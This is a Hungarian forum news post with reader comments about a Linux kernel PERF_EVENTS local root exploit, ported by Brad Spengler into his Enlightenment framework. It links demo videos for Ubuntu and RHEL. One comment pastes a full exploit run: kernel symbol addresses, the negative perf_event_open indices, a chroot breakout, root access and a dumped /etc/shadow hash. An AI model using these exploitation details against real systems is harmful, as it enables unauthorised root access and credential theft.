Videó a Linux kernel sebezhetőség kihasználásáról Ubuntu és Red Hat Enterprise Linux alatt

A csendben javított kritikus linux sebezhetőségre, amelyre három éve létezik exploit, most lecsapott Brad Spengler, a GRSecurity Linux kernel védelmi patch fejlesztője és portolta az eredeti exploit kódját a saját, Enlightenment nevű Linux kernel exploit keretrendszeréhez.

Az új verzió root jogokat szerez az Ubuntu 12.04 rendszereken és minden LSM alapú védelmet kikapcsol, AppArmortól az SELinuxig. A videó megtekinthető róla itt:

http://www.youtube.com/watch?v=llqxbMgIztk&hd=1

A problémát okozó PERF_EVENTS biztonsági hiba eredetileg csak 2.6.37 kerneleket és utánuk következőket érintette 3.8.10-ig, de a Red Hat sikeresen portolta vissza a sebezhetőséget az Enterprise Linux 6 esetén használt 2.6.32 verzióra is, így azok is támadhatók. Videó róla itt:

http://www.youtube.com/watch?v=WI0FXZUsLuI&hd=1

Hozzászólások

koszi! legalabb videon latni neha linuxot, ha mashol nem is.

már chroot és fs namespaces kitöréssel:


bash-4.2$ id
uid=65534 gid=65534 groups=65534
bash-4.2$ uname -a
bash: uname: command not found
bash-4.2$ /
bin/   jail/  lib/   usr/   var/
bash-4.2$ cd /jail
bash-4.2$ ./exploit
Choose your exploit:
 [0] Abacus: Linux 2.6.37 -> 3.8.9 PERF_EVENTS local root
 [1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
 [2] Sieve: Linux 2.6.18+ move_pages() infoleak
 [3] Exit
> 0
 ------------------------------------------------------------------------------
 Seek not the favor of the multitude; it is seldom got by honest and lawful
 means.  But seek the testimony of few; and number not voices, but weigh
 them. --Kant
 ------------------------------------------------------------------------------
 [+] Resolved init_task to 0xffffffff81c0d020 (via System.map)
 [+] Resolved init_fs to 0xffffffff81c4ab80 (via System.map)
 [+] Resolved selinux_enforcing to 0xffffffff81f0862c (via System.map)
 [+] Resolved selinux_enabled to 0xffffffff81f08628 (via System.map)
 [+] Resolved apparmor_enabled to 0xffffffff81c62e2c (via System.map)
 [+] Resolved security_ops to 0xffffffff81f06dd8 (via System.map)
 [+] Resolved default_security_ops to 0xffffffff81c5cf60 (via System.map)
 [+] Resolved sel_read_enforce to 0xffffffff812aaba0 (via System.map)
 [+] Resolved audit_enabled to 0xffffffff81e7af8c (via System.map)
 [+] Resolved commit_creds to 0xffffffff81092690 (via System.map)
 [+] Resolved prepare_kernel_cred to 0xffffffff81092940 (via System.map)
 [+] Resolved xen_start_info to 0xffffffff81dd9d48 (via System.map)
 [+] Resolved mark_rodata_ro to 0xffffffff810419d0 (via System.map)
 [+] Resolved set_kernel_text_ro to 0xffffffff81041980 (via System.map)
 [+] Resolved make_lowmem_page_readonly to 0xffffffff81009c00 (via System.map)
 [+] Resolved make_lowmem_page_readwrite to 0xffffffff81009c40 (via System.map)
 [+] Submitting index of -1 to perf_event_open
 [+] Submitting index of -2 to perf_event_open
 [+] CONFIG_JUMP_LABEL detected
 [+] Resolved perf_swevent_enabled to 0xffffffff81ef77a0 (via System.map)
 [+] Array base is 0xffffffff81ef77a0
 [+] Targeting 0xffffffff81dd8118
 [+] Submitting index of -49051 to perf_event_open
 [+] Got ring0!
 [+] Detected 2.6/3.x style 8k stacks, with current at 0xffff8803ed865c00 and cred support
 [+] Disabled security of : nothing, what an insecure machine!
 [+] Found ->fs offset at 0x548
 [+] Broke out of any chroots or fs namespaces
 [+] Got root!
root@ubuntu:/#id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/#uname -a
Linux ubuntu 3.2.0-39-generic #62-Ubuntu SMP Thu Feb 28 00:28:53 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:/#/
bin/        cdrom/      etc/        lib/        lib64/      media/      opt/        root/       sbin/       srv/        tank/       usr/
boot/       dev/        home/       lib32/      lost+found/ mnt/        proc/       run/        selinux/    sys/        tmp/        var/
root@ubuntu:/#head -1 /etc/shadow
root:$6$9d95PQXm$4nFdOCxtqPi8wMBugl4taKaCax574hAD2f0g6.6nKjdmcVxxXKB23O76GuvMuXMB0X3ZrR5jSHopJbvR8sqL40:15843:0:99999:7:::
root@ubuntu:/#

hamarosan vserver "támogatással"... :)

És a rúteredtől az ISP-dig, milyen kábeled van?
Ha nem WGA-s, akkor menet közben simán ugyanúgy megcsapolhatják az információidat.
Sőt, ott sokkal valószínűbb.

Ezért jobb vezeték nélküli hálózatokon nyomtatni, mert ott könnyebb észrevenni, ha lopják az adataidat: ugyanis, ha valaki a szobád előtt / ablakod alatt, egy bitekre specializált lepkehálóval hadonászik, az nagy valószínűséggel egy adataidat lopó krekker lesz.
De ez ellen is lehet védekezni, ha rézzel és üvegszállal átszőtt tapétát helyezel el a falon, és a Windows-on is.

Majd akkor kell ilyen ha grafikus felület is lesz hozzá...:-)))

SELinux freak-eknek lehet különösen érdekes, hogy:
"minden LSM alapú védelmet kikapcsol, AppArmortól az SELinuxig"

"Jegyezze fel a vádhoz - utasította Metcalf őrnagy a tizedest, aki tudott gyorsírni. - Tiszteletlenül beszélt a feljebbvalójával, amikor nem pofázott közbe."

de ezt miért nem küldted be hírnek? szerintem elég nagy hírértéke van...